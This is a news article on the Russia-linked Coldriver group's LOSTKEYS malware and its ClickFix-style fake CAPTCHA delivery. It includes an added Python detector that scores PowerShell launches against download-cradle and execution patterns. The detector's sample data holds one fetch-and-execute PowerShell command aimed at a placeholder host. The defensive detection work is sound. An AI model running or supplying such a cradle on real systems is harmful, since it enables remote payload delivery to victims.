Russia-linked Coldriver hackers deploy new espionage malware in targeted attacks

A new cyber-espionage campaign by the Russia-aligned threat actor Coldriver has been deploying a previously unknown malware strain dubbed ‘LOSTKEYS,’ according to a report from Google’s Threat Intelligence Group (GTIG).

Coldriver, also tracked as Callisto, Star Blizzard, and UNC4057, is known for credential theft and data exfiltration, often targeting high-profile geopolitical entities. The group's increasing use of custom malware highlights growing sophistication and persistence in its cyber operations.

First observed in late 2023 and used in targeted attacks as recently as April 2025, LOSTKEYS is designed to steal sensitive files, harvest system information, and exfiltrate details about running processes. Victims include current and former Western government advisors, journalists, NGOs, think tanks, and individuals linked to Ukraine.

“We believe the primary goal of COLDRIVER’s operations is intelligence collection in support of Russia’s strategic interests,” the researchers said. “In a small number of cases, the group has been linked to hack-and-leak campaigns targeting officials in the UK and an NGO.”

GTIG researchers say the attacks begin with a deceptive CAPTCHA-style lure on a fake website, a method similar to the known ClickFix social engineering technique. Victims are tricked into executing a PowerShell command that downloads and launches a multistage payload from a remote server. The final stage executes the LOSTKEYS malware, which is capable of extracting data from specific directories and file types.
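The ClickFix-style delivery described above leaves a recognisable trace on the endpoint: a PowerShell process, launched from the interactive shell the user pasted into, whose command line carries a download cradle and in-memory execution. The following is an added example, written for this page and not code from GTIG or from the Coldriver toolset, that scores process-creation records for that pattern. The indicator list, the weights, the alert threshold, and the assumption that the Run dialog shows up as `explorer.exe` spawning `powershell.exe` are all the editor's choices, and the sample events are constructed to exercise the logic, not real telemetry from the campaign.

```python
"""Heuristic scorer for ClickFix-style PowerShell launches.

Added example, not GTIG's or Coldriver's code. Indicator weights and the
threshold are illustrative assumptions; the sample events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (field names mirror Sysmon Event ID 1)."""
    image: str
    parent_image: str
    command_line: str


# Assumption: the Run dialog (Win+R) is hosted by explorer.exe, so a pasted
# ClickFix command appears as explorer.exe -> powershell.exe with no shell between.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Each indicator is scored independently. Weights are editorial, not from the report.
INDICATORS = [
    ("download_cradle", 3, re.compile(
        r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient"
        r"|\bcurl\b|\bwget\b|start-bitstransfer", re.I)),
    ("in_memory_exec", 2, re.compile(r"\biex\b|invoke-expression", re.I)),
    ("hidden_window", 1, re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("no_profile", 1, re.compile(r"-nop\b|-noprofile", re.I)),
    ("policy_bypass", 1, re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
    ("encoded_command", 2, re.compile(
        r"\s-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # Many ClickFix lures append a comment so the pasted text reads like a
    # verification string in the Run box; a comment mentioning a CAPTCHA is a tell.
    ("captcha_comment", 2, re.compile(r"#.*(captcha|not a robot|verify|human)", re.I)),
]
ALERT_THRESHOLD = 5


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent):
    """Return (score, reasons). Anything that is not PowerShell scores 0."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    reasons, total = [], 0
    for name, weight, rx in INDICATORS:
        if rx.search(ev.command_line):
            reasons.append(name)
            total += weight
    # Only boost the interactive-parent case when the command line is already
    # suspicious; users do legitimately launch plain PowerShell from Win+R.
    if reasons and basename(ev.parent_image) in INTERACTIVE_PARENTS:
        reasons.append("interactive_parent")
        total += 3
    return total, reasons


def detect(events, threshold: int = ALERT_THRESHOLD):
    """Indexes, scores and reasons of events at or above the alert threshold."""
    return [(i, s, r) for i, (s, r) in enumerate(map(score_event, events)) if s >= threshold]


# Constructed sample telemetry (hostnames use the reserved .invalid TLD).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # ClickFix-style paste: explorer.exe parent, hidden window, cradle, fake CAPTCHA comment.
    ProcessEvent(PS, r"C:\Windows\explorer.exe",
                 "powershell -w hidden -nop -c \"iex (New-Object Net.WebClient)"
                 ".DownloadString('http://captcha.invalid/r')\" # I am not a robot"),
    # Benign scheduled backup script.
    ProcessEvent(PS, r"C:\Windows\System32\cmd.exe",
                 r"powershell.exe -File C:\scripts\backup.ps1"),
    # Service-driven download: has a cradle but no interactive parent or exec trick.
    ProcessEvent(PS, r"C:\Windows\System32\svchost.exe",
                 r'powershell.exe -NoProfile -Command "Invoke-WebRequest '
                 r'-Uri https://updates.example.invalid/agent.msi -OutFile C:\Temp\agent.msi"'),
    # Not PowerShell at all.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for idx, score, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT event[{idx}] score={score} reasons={reasons}")
```

Run stand-alone, only the first sample trips the threshold; the service-driven download scores below it because a cradle on its own is common in legitimate automation. Tune the weights against your own baseline, and do not treat the `explorer.exe` parent as the only route in: the command can equally be pasted into a terminal the user already has open. The later stages GTIG describes (the multi-stage download and the final LOSTKEYS payload) run after this first command and are not modelled here.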

While LOSTKEYS has only been selectively deployed, Google also identified older malware artifacts disguised as files related to the Maltego investigation platform. The connection between these early samples and Coldriver remains unclear.

8 May 2025